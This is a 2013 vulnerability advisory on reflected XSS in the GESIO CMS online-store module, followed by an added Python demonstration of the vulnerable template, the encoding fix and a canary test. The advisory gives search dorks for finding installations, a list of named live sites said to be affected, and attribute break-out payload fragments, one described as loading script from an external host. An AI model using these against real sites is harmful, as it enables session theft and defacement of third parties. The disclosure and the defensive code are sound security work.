+=============================================================================================+
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code                                +
+=============================================================================================+

Author(s): Ivan Sanchez & Raul Diaz
Product: Software Gestión GESIO
Web: http://www.gesio.com/
Versions: Modulo / Tienda Online (Online Store module) - CMS
Date: 18/04/2013
Vendor Notified: 18/04
Vendor Notified again: 19/04

Extract: http://www.gesio.com/tienda-online-cms-89-50-431/
"Your online store, connected to your daily invoicing. You invoice with the same system you
sell with online. At GESIO® we believe an online management system must offer the option of
building an Online Store."

GOOGLE DORKS:
------------
allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO®
inurl:cms/site_0003

Sites affected
--------------------
All sites using this CMS, among them:
http://www.qualitycenter.es/lp/
http://www.greenhabit.es/lp/
http://www.latiendadelhormigonimpreso.com/lp/
http://www.minisub.es/lp/
http://www.vitalarchery.com/lp/
http://www.palacios-congresos-es.com/lcli/
http://www.aulasconsoftware.com/lp/
http://www.arthulencourt.eu/lp/
http://www.soltercam.com/lp/
http://www.sol-i-vent.es/lp/
http://www.ale-hop.org/lp/
http://creugal-hobby.com/lp/
http://www.xipnet.es/lp/
http://www.canterbury.es/lp/
http://ociostock.com/lp/
http://guatebloem.com/productos_listado.php
many more...

Attacks
>>>>>>>>>>>>>>>>>>>

XSS & REMOTE INJECTION CODE:
---------------------------
'">>
EvilCode Team

Or ">
EXTERNAL EVIL CODE!

Parameter Affected:
-------------------
--form 1 --
http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE
and much more...

The filtro_texto search parameter is reflected into the page without encoding. The leading
'"> in both payloads closes the attribute value and the tag the parameter is echoed into, so
any markup that follows is rendered by the victim's browser; the second variant loads the
attacker's script from an external host rather than carrying it inline.

Remediation:
------------
Please validate the input and sanitize (HTML-encode) each parameter before it is reflected
into the page. Thank you very much!

NULL CODE SERVICES [ www.evilcode.com.ar ]
Hunting Security Bugs!
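The following is an added example written for this page, not code from the advisory authors or from GESIO. It reproduces the class of bug described above with an assumed server-side template for comunicados_listado.php (the real template is not published; only the parameter name filtro_texto and the '"> break-out are taken from the advisory), shows the attribute-encoding fix the remediation asks for, and includes the check a tester would run to tell a fixed page from a vulnerable one. All responses are constructed strings; nothing is fetched from the network.

```python
"""Reflected XSS in a search parameter: assumed vulnerable rendering, hardened
rendering, and a reflection check. Added example, not the advisory's code."""
import html
from html.parser import HTMLParser

# Both payloads in the advisory open with '"> : the quote characters end the
# attribute value regardless of which quote style the template used, and the
# '>' closes the tag, so whatever follows is parsed as new markup.
BREAKOUT = "'\">"

# Assumption: the search form echoes the submitted filter back into the box.
TEMPLATE_TAGS = ("form", "input")


def render_vulnerable(filtro_texto: str) -> str:
    """Assumed vulnerable template: the parameter is concatenated raw into the
    value attribute, which is the behaviour the advisory reports."""
    return ('<form method="get" action="comunicados_listado.php">'
            '<input type="text" name="filtro_texto" value="'
            + filtro_texto + '"></form>')


def render_hardened(filtro_texto: str) -> str:
    """Same template with HTML attribute encoding applied at output time.
    quote=True also encodes ' and ", so the break-out sequence cannot end the
    attribute; the browser still displays the original text to the user."""
    safe = html.escape(filtro_texto, quote=True)
    return ('<form method="get" action="comunicados_listado.php">'
            '<input type="text" name="filtro_texto" value="'
            + safe + '"></form>')


class _TagCollector(HTMLParser):
    """Records every start tag and the value attribute of each <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.input_values: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # HTMLParser decodes character references in attribute values,
            # so an encoded reflection comes back as the original text.
            self.input_values.append(dict(attrs).get("value") or "")


def injected_tags(body: str) -> list[str]:
    """Tags in the response that the template never emits. A non-empty list
    means the parameter broke out of its attribute and created markup."""
    p = _TagCollector()
    p.feed(body)
    return [t for t in p.tags if t not in TEMPLATE_TAGS]


def reflected_input_value(body: str) -> str:
    """Decoded value attribute of the search box as a browser would see it."""
    p = _TagCollector()
    p.feed(body)
    return p.input_values[0] if p.input_values else ""


def is_reflected_unencoded(body: str, canary: str) -> bool:
    """Tester's check: the break-out sequence followed by a unique canary
    appears byte-for-byte in the response. An encoded reflection
    (&#x27;&quot;&gt;canary) does not match, so the fixed page passes."""
    return (BREAKOUT + canary) in body


def probe(render, canary: str = "xsscanary") -> dict:
    """Send a harmless marker tag through a renderer and report what came back.
    <xss> is an unknown element: it proves injection without executing anything."""
    payload = BREAKOUT + "<xss>" + canary
    body = render(payload)
    return {
        "unencoded": is_reflected_unencoded(body, "<xss>" + canary),
        "injected": injected_tags(body),
        "value_preserved": reflected_input_value(body) == payload,
    }


if __name__ == "__main__":
    print("vulnerable:", probe(render_vulnerable))
    print("hardened:  ", probe(render_hardened))
```

Against a live target the same check is a single GET of comunicados_listado.php?filtro_texto='">xsscanary followed by a search for the literal '">xsscanary in the body; the canary avoids false positives from strings already on the page, and the absence of any tag outside the template in the hardened output shows that encoding, not stripping, is what keeps the user's search text intact while defeating the break-out.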